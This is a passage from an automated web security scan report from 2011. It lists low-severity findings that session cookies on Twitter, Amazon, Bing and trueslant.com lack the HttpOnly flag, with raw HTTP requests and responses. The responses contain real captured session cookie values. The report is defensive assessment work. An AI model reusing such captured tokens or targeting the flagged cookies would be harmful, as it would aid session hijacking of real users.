Confidence:	Firm
Host:	http://trueslant.com
Path:	/milesobrien/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSSESSID=ts-www0; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /milesobrien/ HTTP/1.1
Host: trueslant.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:01:12 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Vary: Cookie,Accept-Encoding
X-FBC-Login: anonymous fbuid=0, wpuid=0
X-Pingback: http://trueslant.com/milesobrien/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSSESSID=ts-www0; path=/
Content-Length: 75441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" dir="ltr" xmlns:fb="http
...[SNIP]...

17.24. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWY3NzI0MTZlMzM1NDZkMGY1ZTRhYmFmNDRmZGQwYzk2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyA2e1C0B--25862b81113d9ea376a5433cc256332cc9ae6576; domain=.twitter.com; path=/
k=173.193.214.243.1296352284099799; path=/; expires=Sun, 06-Feb-11 01:51:24 GMT; domain=.twitter.com
guest_id=129635228410273876; path=/; expires=Tue, 01 Mar 2011 01:51:24 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 01:51:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296352284-49541-12061
ETag: "cde121a33e5e26c8e020ac06ab7c0791"
Last-Modified: Sun, 30 Jan 2011 01:51:24 GMT
X-Runtime: 0.00851
Content-Type: text/html; charset=utf-8
Content-Length: 45480
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296352284099799; path=/; expires=Sun, 06-Feb-11 01:51:24 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635228410273876; path=/; expires=Tue, 01 Mar 2011 01:51:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY3NzI0MTZlMzM1NDZkMGY1ZTRhYmFmNDRmZGQwYzk2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyA2e1C0B--25862b81113d9ea376a5433cc256332cc9ae6576; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

17.25. http://twitter.com/$1 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/$1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CToOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vJDE6B2lkIiUz%250AMDJhZjczMTdmZTIxZDk3NzMzNDBiYTMyNDM0ZmVkYyIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCBcVntQtAQ%253D%253D--b2904d61596531162db12f902f763da54e6b7b41; domain=.twitter.com; path=/
k=173.193.214.243.1296352285964730; path=/; expires=Sun, 06-Feb-11 01:51:25 GMT; domain=.twitter.com
guest_id=129635228597484210; path=/; expires=Tue, 01 Mar 2011 01:51:25 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /$1 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 30 Jan 2011 01:51:25 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296352285-22471-55414
Last-Modified: Sun, 30 Jan 2011 01:51:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296352285964730; path=/; expires=Sun, 06-Feb-11 01:51:25 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635228597484210; path=/; expires=Tue, 01 Mar 2011 01:51:25 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vJDE6B2lkIiUz%250AMDJhZjczMTdmZTIxZDk3NzMzNDBiYTMyNDM0ZmVkYyIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCBcVntQtAQ%253D%253D--b2904d61596531162db12f902f763da54e6b7b41; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

17.26. http://twitter.com/HelenASPopkin previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/HelenASPopkin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWMwOWVkYzE1OTI2MDk0NDQ1ZGJiYjRjMmFiYmJlNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIW2nf1C0B--6f9e351ce1cfdf99abad41c8d129848e96fc4a8b; domain=.twitter.com; path=/
k=173.193.214.243.1296356567344651; path=/; expires=Sun, 06-Feb-11 03:02:47 GMT; domain=.twitter.com
guest_id=129635656738576607; path=/; expires=Tue, 01 Mar 2011 03:02:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HelenASPopkin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.27. http://twitter.com/MichaelWann previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/MichaelWann

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTNmZTg1NjI1MTBlYzM3OTk0YzQwOGRkYTcxODQyOTYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUh3f1C0B--ba2b2e85d86e8242c7c9defb78d02e28bd4f565e; domain=.twitter.com; path=/
k=173.193.214.243.1296356547913422; path=/; expires=Sun, 06-Feb-11 03:02:27 GMT; domain=.twitter.com
guest_id=129635654792136829; path=/; expires=Tue, 01 Mar 2011 03:02:27 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MichaelWann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.28. http://twitter.com/home previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CToOcmV0dXJuX3RvIhxodHRwOi8vdHdpdHRlci5jb20vaG9tZToHaWQi%250AJWRjMWRmOThmMDAwNDUzYjkyYTM3NmFmOTNjNGU0MTQ5IgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOg9jcmVhdGVkX2F0bCsIq0KD1C0B--af7bf9547cbf91a6342f4ce9df7d07f956b84c1c; domain=.twitter.com; path=/
k=173.193.214.243.1296350528168573; path=/; expires=Sun, 06-Feb-11 01:22:08 GMT; domain=.twitter.com
guest_id=129635052817015374; path=/; expires=Tue, 01 Mar 2011 01:22:08 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Sun, 30 Jan 2011 01:22:08 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fhome
X-Runtime: 0.00200
Content-Type: text/html; charset=utf-8
Content-Length: 119
Cache-Control: no-cache, max-age=300
Set-Cookie: k=173.193.214.243.1296350528168573; path=/; expires=Sun, 06-Feb-11 01:22:08 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635052817015374; path=/; expires=Tue, 01 Mar 2011 01:22:08 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhxodHRwOi8vdHdpdHRlci5jb20vaG9tZToHaWQi%250AJWRjMWRmOThmMDAwNDUzYjkyYTM3NmFmOTNjNGU0MTQ5IgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOg9jcmVhdGVkX2F0bCsIq0KD1C0B--af7bf9547cbf91a6342f4ce9df7d07f956b84c1c; domain=.twitter.com; path=/
Expires: Sun, 30 Jan 2011 01:27:08 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>

17.29. http://twitter.com/status/user_timeline/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/status/user_timeline/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWQwOTAwOWQ4YTEyZTkwNjk3ZWUwNjg3ZTU1MTZkODkwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI0xme1C0B--a43ce2094d1eef88867360254755d2f875798bf8; domain=.twitter.com; path=/
k=173.193.214.243.1296352287179441; path=/; expires=Sun, 06-Feb-11 01:51:27 GMT; domain=.twitter.com
guest_id=12963522871862479; path=/; expires=Tue, 01 Mar 2011 01:51:27 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /status/user_timeline/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 30 Jan 2011 01:51:27 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296352287-29136-7189
Last-Modified: Sun, 30 Jan 2011 01:51:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296352287179441; path=/; expires=Sun, 06-Feb-11 01:51:27 GMT; domain=.twitter.com
Set-Cookie: guest_id=12963522871862479; path=/; expires=Tue, 01 Mar 2011 01:51:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQwOTAwOWQ4YTEyZTkwNjk3ZWUwNjg3ZTU1MTZkODkwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI0xme1C0B--a43ce2094d1eef88867360254755d2f875798bf8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

17.30. http://twitter.com/windabenedetti previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/windabenedetti

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWZiZjBlYjQ4OTMwMGMzOTA3Nzg4OTQxNTc0YzEzN2JmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8JHf1C0B--5fe442064eb48ecd736f8d0fc43646e6d9ffb6d4; domain=.twitter.com; path=/
k=173.193.214.243.1296356577758623; path=/; expires=Sun, 06-Feb-11 03:02:57 GMT; domain=.twitter.com
guest_id=12963565777757520; path=/; expires=Tue, 01 Mar 2011 03:02:57 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windabenedetti HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.31. http://twitter.com/wjrothman previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/wjrothman

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTVjMmFiMWM4ZTg4ZjRhNmE2N2QyZTlhMzYyMDlkNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIrFrf1C0B--3aa7bb9fe9c6795ddbbf9680544888cbf7541ea2; domain=.twitter.com; path=/
k=173.193.214.243.1296356563232205; path=/; expires=Sun, 06-Feb-11 03:02:43 GMT; domain=.twitter.com
guest_id=129635656362644604; path=/; expires=Tue, 01 Mar 2011 03:02:43 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wjrothman HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.32. https://twitter.com/ToddKenreck previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/ToddKenreck

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/
k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com
guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.33. http://www.amazon.com/gp/product/0470650923 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0470650923

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.34. http://www.amazon.com/gp/product/0672333368 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0672333368

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.35. http://www.amazon.com/gp/product/0981511821 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0981511821

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.36. http://www.amazon.com/gp/product/184968006X previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/184968006X

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.37. http://www.amazon.com/gp/product/1935182374 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/1935182374

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.38. http://www.bing.com/shopping/content/search previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/shopping/content/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=1A7DB7C3FD212CE528E8DB8E0E3E23F1; Path=/shopping
_SS=SID=F972E03C2EDF4FC68C89EA08C563AB35; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7643fc9f42644b73a510efc43bf9535c; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.39. http://www.bing.com/travel/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=32FADE2FA84EF5FA97AB9602B43221A4; Domain=.bing.com; Path=/travel
ETID=BCID-23es9dprqmhf2yz5b70uaphsurhm_VID-8s1eg7na0h4jyz617ujc5pm7spr_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:07:24 GMT; Path=/travel
_SS=SID=1ABB65B487EE44FBB0D3AEF855DF1C31; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c995d1595d772411ea969529da0bbdb7f; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:24 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.40. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=37564E6E7F080774679ECF5997C16D07; Path=/travel
_SS=SID=C3CD398E1DFA4C4F975438AABABE6119; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c668c910cbe204671b9924806983f4bab; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:54 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.41. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/cheap-flights-to-the-caribbean.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=91A2C96FEAD616EEDDD9ECC848595A2F; Domain=.bing.com; Path=/travel
ETID=BCID-ztqi6svu5vffcyz679phcpo04evn_VID-z4lcugfibg3fcmyz48nd68tfhq64b_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:08:44 GMT; Path=/travel
_SS=SID=1068051DB7E84B2BACE10D21337CBEC9; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea85c8550be4c23baed6b6abf5423ed; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
